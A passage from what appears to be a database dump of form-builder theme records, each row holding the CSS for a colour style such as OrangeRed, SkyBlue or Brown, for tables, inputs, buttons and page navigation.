!important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#3E95CB !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#fff !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#3DAEF2 !important;\nborder-radius:2px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#3E95CB !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#3E95CB !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#3E95CB !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#3E95CB !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#3E95CB !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\npadding-left: 35px !important;\nmargin-right: -16px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
(33, 'Style 5 OrangeRed', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left !important;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:center;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit !important;\n		padding-right:inherit !important;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#FCA64F !important;\ntext-align:left !important;\npadding:6px !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#F24004;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#fff !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#fff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#fff !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#F5611C !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#000 !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#FCA64F !important;\nborder-radius:2px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F5611C !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F5611C !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F5611C !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F5611C !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#F24004 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\npadding-left: 35px !important;\nmargin-right: -16px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
(34, 'Style 6 SkyBlue', 'table {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left !important;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:center;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#535E74 !important;\nborder:8px solid #DBE4E3 !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #535E74 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #DBE4E3 !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #535E74 !important;\ncolor:#535E74 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #535E74 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#535E74 !important;\n}\n.wdform_date_fields select\n{\ncolor:#535E74 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #535E74 !important;\n}\n.am_pm_select\n{\ncolor:#535E74 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #535E74 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #535E74 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#535E74 !important;\n}\n.wdform_address input\n{\ncolor:#535E74 !important;\nborder-radius:4px !important;\nborder:1px solid #535E74 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#535E74 !important;\nborder:1px solid #535E74 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#535E74 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #535E74 !important;\n}\n.wdform_colon\n{\ncolor:#535E74 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#535E74 !important;\n}\n.wdform_line\n{\ncolor:#535E74 !important;\n}\n.time_box\n{\ncolor:#535E74 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #535E74 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#535E74 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#535E74 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#535E74 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #535E74 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#535E74 !important;\nfont-style:normal !important;\nborder:1px solid #535E74 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red;\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:1px solid #535E74 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#535E74 !important;\n}\n.file_upload\n{\nborder:1px solid #535E74 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#535E74 !important;\n}    \n.page_deactive\n{\ncolor:#DBE4E3 !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#535E74 !important;\n}\n.page_active\n{\ncolor:#535E74 !important;\nborder:4px solid #535E74 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBE4E3 !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#DBE4E3 !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #DBE4E3 !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #DBE4E3 !important;\nbackground-color:#535E74 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#535D76 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#535D76 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #535E74 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#535E74 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#535E74 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#535D76 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#535D76 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #535E74 !important;\nborder-radius:7px !important;\n}', 0),
(35, 'Style 6 Brown', 'table {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left !important;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:center;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#702400 !important;\nborder:8px solid #FFD39C !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #702400 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #FFD39C !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #702400 !important;\ncolor:#702400 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #702400 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#702400 !important;\n}\n.wdform_date_fields select\n{\ncolor:#702400 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #702400 !important;\n}\n.am_pm_select\n{\ncolor:#702400 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #702400 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #702400 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#702400 !important;\n}\n.wdform_address input\n{\ncolor:#702400 !important;\nborder-radius:4px !important;\nborder:1px solid #702400 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#702400 !important;\nborder:1px solid #702400 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#702400 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #702400 !important;\n}\n.wdform_colon\n{\ncolor:#702400 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#702400 !important;\n}\n.wdform_line\n{\ncolor:#702400 !important;\n}\n.time_box\n{\ncolor:#702400 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #702400 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#702400 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#702400 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#702400 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #702400 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#702400 !important;\nfont-style:normal !important;\nborder:1px solid #702400 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:1px solid #702400 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#702400 !important;\n}\n.file_upload\n{\nborder:1px solid #702400 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#702400 !important;\n}    \n.page_deactive\n{\ncolor:#FFD39C !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#702400 !important;\n}\n.page_active\n{\ncolor:#702400 !important;\nborder:4px solid #702400 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FFD39C !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#FFD39C !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #FFD39C !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #FFD39C !important;\nbackground-color:#702400 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#702400 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#702400 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px 